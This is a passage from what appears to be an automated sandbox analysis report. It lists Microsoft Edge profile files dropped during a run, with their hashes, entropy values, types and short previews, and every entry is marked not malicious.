Preview:	2024/07/26-14:10:33.120 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/07/26-14:10:33.122 18e8 Recovering log #3.2024/07/26-14:10:33.124 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.22589227104407
Encrypted:	false
SSDEEP:	12:3Brv4YebvqBZFUt8i6/+igT5LYebvqBaJ:3Br4Yebvyg8ieeLYebvL
MD5:	95F172A15DD7662D91E01EC388E7AC6D
SHA1:	1B5F5A6B457494D1BB20BEDED47E85BB60281213
SHA-256:	E31972FBAFF985FEBF9A67EFA9F9AD95E6E03F3DAC3878473FFA26E73B5B5595
SHA-512:	86D420D2003754AE82EE2D2ED1362DD783A28C90512EADAD7C4AAAD306E7DD6F7083DB16D1E943F854F7ED632226776EA1200C0F73DB5B786DBEE08370535924
Malicious:	false
Preview:	2024/07/26-14:10:33.120 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/07/26-14:10:33.122 18e8 Recovering log #3.2024/07/26-14:10:33.124 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.186627055161754
Encrypted:	false
SSDEEP:	6:BMylvyq2P923oH+TcwtpIFUt84MyAH1Zmw+4MyzUR0jRkwO923oH+Tcwta/WLJ:3xyv4YebmFUt8iAV/+izUmjR5LYebaUJ
MD5:	EF9FE6519D670DC8F0BEC07F9BB30A81
SHA1:	6C4AB53568D9A20DC467A52FD550C1FB3207D333
SHA-256:	5BC8E94831F7E2DF861772FBC39C9C6C910EF93393576047F65B2824933F4EA4
SHA-512:	2F25865A09BE4B5DDED201BAE1B31696778B31E2B84A8C1BABF9126812C6D4A3FD40FB79ECD1FE2C65D69932CC8EE8A198E96B55AF7014E3535AEA5F525D2362
Malicious:	false
Preview:	2024/07/26-14:10:11.783 14e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/07/26-14:10:11.784 14e4 Recovering log #3.2024/07/26-14:10:11.785 14e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.186627055161754
Encrypted:	false
SSDEEP:	6:BMylvyq2P923oH+TcwtpIFUt84MyAH1Zmw+4MyzUR0jRkwO923oH+Tcwta/WLJ:3xyv4YebmFUt8iAV/+izUmjR5LYebaUJ
MD5:	EF9FE6519D670DC8F0BEC07F9BB30A81
SHA1:	6C4AB53568D9A20DC467A52FD550C1FB3207D333
SHA-256:	5BC8E94831F7E2DF861772FBC39C9C6C910EF93393576047F65B2824933F4EA4
SHA-512:	2F25865A09BE4B5DDED201BAE1B31696778B31E2B84A8C1BABF9126812C6D4A3FD40FB79ECD1FE2C65D69932CC8EE8A198E96B55AF7014E3535AEA5F525D2362
Malicious:	false
Preview:	2024/07/26-14:10:11.783 14e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/07/26-14:10:11.784 14e4 Recovering log #3.2024/07/26-14:10:11.785 14e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.011128429310256389
Encrypted:	false
SSDEEP:	3:ImtVdNRRU6wF/U3//tl+WFplN2z4YtGWV/llh9UtWYKel/L1:IiV15wFc3/hzlE4YtG8f9aNL
MD5:	61788A15864E422282804990CCCF6F9A
SHA1:	72CC4F30B6D4FECBBC920E5C6BD9A4906E28545D
SHA-256:	071E938C483D6CA01572EF65CCA24E63FAEF2ACCC53CF42E4CC9CF2F1352E960
SHA-512:	457119C46A415E35FD7815894668AB9A26CD69CF781714449D8199709CDEA1E0F20C9298C501D60EC6F9F9524A72195F9FE89EF182B5FA427FD081119598F7AE
Malicious:	false
Preview:	VLnk.....?......?......+................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2652182664958354
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMkSAELyKOMq+8yC8F/YfU5m+OlTLVum4:Bq+n0Jk9ELyKOMq+8y9/Own
MD5:	7036BAB7BC20BCAD21C6E343FF0A7E62
SHA1:	843D1AC2B9344DCEE15CBB5C1E069F648C750954
SHA-256:	5E715BD54AFCD39C8B9EF351118296098E1BFC2AC39A0061B91A51AC172FE748
SHA-512:	FFBD13B21DAA966BF4F08C2E35A95A01AAEBBCC63F7A08DD368D3D470F2186A47C18500073A52131923D96EAAFB1C2ABC4F6BBED687A28887D11C8B08A9E8D25
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	2.351022833649252
Encrypted:	false
SSDEEP:	96:ftSjGhp22iShDW9M/6IKXDW97NDIjzVsDW9Mh5DW97f:w8h0IMGVIlsj5Gf
MD5:	0766942641755F7245F6B9568ED05DBB
SHA1:	5D8241632BE4F0E7C29C0BE4B4424DD54D3D30BF
SHA-256:	586F5D363536F010E87FD9BE85C1479A6F4AA79EFC066DCADC396DDC46251901
SHA-512:	D92CC59DAD62972B7E783AE9A9F4CF8D393975FBFB815890280B9F5118A57C7B810C2F079E7DAC910A92E599002CE3AD11EF6CDE14DCDEB282643440A34ABFD3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.41235120905181716
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
MD5:	981F351994975A68A0DD3ECE5E889FD0
SHA1:	080D3386290A14A68FCE07709A572AF98097C52D
SHA-256:	3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
SHA-512:	C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b54006b9-9719-4ddf-b01e-6d7b6ca0815b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f6dc49b6-c1fc-4cc7-86a6-3701f9baf0c9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13432
Entropy (8bit):	5.282434384785932
Encrypted:	false
SSDEEP:	192:stjJ99QTryDioo5abatSuyAs9rsZihodrMkS3s8qbV+F+GwAvt6WDiaFIMYFPVYJ:stjPGooSuTs9rfhodr7bG3wWt6WeaTY4
MD5:	6BD22159110288F6E554A4280DEC48B6
SHA1:	DDF57FEDE2BD444C0429B66A1479C5999B8E6D26
SHA-256:	7E10599F225F294427BB8AD9C9E3A947469818F4322CB7DB4123B1A1E7F77E8A
SHA-512:	0A27F22348C4C3765926F1D4611C56C79E772E39DBE4485BA3D4B7B80A6ED0E7235545F1F51F85D9B70ECBA0D87DB4F3FC5A41DAF67B239C4519002F290B15DD
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fde22db9-372d-4d96-85de-501cafff87f6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.24185549345588597
Encrypted:	false
SSDEEP:	48:F4tonnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnaIY3YzCEI:F23IYY
MD5:	80DD5958668304078FA7A28FC7D22E25
SHA1:	EB60EE46FFA9E6C45AFC40629C8F0584DD8272E7
SHA-256:	362DDB452DA7884E0099D271C76DEC69E809BB5578DB09219DCD4CFB29BDF951
SHA-512:	57F3C4282BC4E54CEEFAF59CDB64B8E5F0E04C739CE7C56E9FEDDA67749B3FB219D0AF40DC579D50E58178CB2C1B912DF1050D1D85FD4D27E0E02559616B06EE
Malicious:	false
Preview:	..-.....:...............X..._....4..}..2.M(4.R'..-.....:...............X..._....4..}..2.M(4.R'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	1025912
Entropy (8bit):	1.65195653386121
Encrypted:	false
SSDEEP:	3072:xepb3bdwSYJC5K8DSpwxlzPjv6z6oGo1IKS+rC4XvH1gJl0giFLeEyedw/Dvp3bi:a4
MD5:	699A8AE9CCC2887B7F8DABD537DC81BE
SHA1:	62133AEB350B5B983CC4C55155AB946978C47E21
SHA-256:	1FBEA48B775CBEF91B99113E8BE4C35AE6EE29FDDB421FE848454D3AF3DDEBE8
SHA-512:	4EEF61E7F12A49A67C69FFC037F83729EB03CD1FFCF0277097D4C45E0B3D06D3644172414CA87266CA117F56D3F11B79A91B4460264E6FB114CA71DAE64D52E2
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	628
Entropy (8bit):	3.2366954856973145
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuAka8k:iDq
MD5:	49D90097B946EDB443A1FCF9757CB4F6
SHA1:	FF61E3EBA8A1AC43933B91B70A991C26FEEDFE38
SHA-256:	452516E95D4B21A7FA2F85AD27AB53D6FABB48AF535899AE66D91B7D9E1D308F
SHA-512:	8614867A0FA119FDB301E82C327DABC4548E8D8BC7E12054CC51B5965DDC4F266A1F0E897E53888C6ADB272DA22DB1FFA411BCD3BF6470C243B045E3EE14E031
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............2...0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.211829537475392
Encrypted:	false
SSDEEP:	6:BMykRu/3+q2P923oH+TcwtfrK+IFUt84MykRQHZmw+4MykRQk3VkwO923oH+Tcwf:3kk/Ov4Yeb23FUt8ikO/+ikX5LYeb3J
MD5:	982F100070A3F3A17A9FE38DA0F85637
SHA1:	FCC92E638DA38BBC9E4CFEBC8167E02D11D57D23
SHA-256:	E752B1E64261AB2EC5A23F9E20DECD284F39A14C8AD3F27587CCEAFB0975DF62
SHA-512:	7370B5F31FC0272B2D314D421DE743BCA3162C71E8BAEFE60F505D54ECA33678A2EEC10FEAF8FF375A873FBFAF73CFBD516BF01EEA745FE4E775761352881739
Malicious:	false
Preview:	2024/07/26-14:10:12.449 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/07/26-14:10:12.450 14e8 Recovering log #3.2024/07/26-14:10:12.451 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.211829537475392
Encrypted:	false
SSDEEP:	6:BMykRu/3+q2P923oH+TcwtfrK+IFUt84MykRQHZmw+4MykRQk3VkwO923oH+Tcwf:3kk/Ov4Yeb23FUt8ikO/+ikX5LYeb3J
MD5:	982F100070A3F3A17A9FE38DA0F85637
SHA1:	FCC92E638DA38BBC9E4CFEBC8167E02D11D57D23
SHA-256:	E752B1E64261AB2EC5A23F9E20DECD284F39A14C8AD3F27587CCEAFB0975DF62
SHA-512:	7370B5F31FC0272B2D314D421DE743BCA3162C71E8BAEFE60F505D54ECA33678A2EEC10FEAF8FF375A873FBFAF73CFBD516BF01EEA745FE4E775761352881739
Malicious:	false
Preview:	2024/07/26-14:10:12.449 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/07/26-14:10:12.450 14e8 Recovering log #3.2024/07/26-14:10:12.451 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.181375027464502
Encrypted:	false
SSDEEP:	6:BMykWu2+q2P923oH+TcwtfrzAdIFUt84MykR3BZmw+4MykRiU2VkwO923oH+Tcwc:3kWu3v4Yeb9FUt8ikr/+ikAN5LYeb2J
MD5:	F0DB43BBDA127ED62DDF6647FDB7058F
SHA1:	92C00BB38E8754E600A456FD8FFAB1C99A8AAA3F
SHA-256:	A7D0B5E1744157FEF0DCDC70260E8B45DE308D9399D7F73FF896528D0C28FD52
SHA-512:	23A75C497C19E920D43CFB1C8BDFB626F81D5200A8B9D169872A3630428096CD2B34DCD3AEDD2FA26C226B70B7753B029C8336ACA9289E053969838778E9FB46
Malicious:	false
Preview:	2024/07/26-14:10:12.344 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/07/26-14:10:12.444 14e8 Recovering log #3.2024/07/26-14:10:12.445 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.181375027464502
Encrypted:	false
SSDEEP:	6:BMykWu2+q2P923oH+TcwtfrzAdIFUt84MykR3BZmw+4MykRiU2VkwO923oH+Tcwc:3kWu3v4Yeb9FUt8ikr/+ikAN5LYeb2J
MD5:	F0DB43BBDA127ED62DDF6647FDB7058F
SHA1:	92C00BB38E8754E600A456FD8FFAB1C99A8AAA3F
SHA-256:	A7D0B5E1744157FEF0DCDC70260E8B45DE308D9399D7F73FF896528D0C28FD52
SHA-512:	23A75C497C19E920D43CFB1C8BDFB626F81D5200A8B9D169872A3630428096CD2B34DCD3AEDD2FA26C226B70B7753B029C8336ACA9289E053969838778E9FB46
Malicious:	false
Preview:	2024/07/26-14:10:12.344 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/07/26-14:10:12.444 14e8 Recovering log #3.2024/07/26-14:10:12.445 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
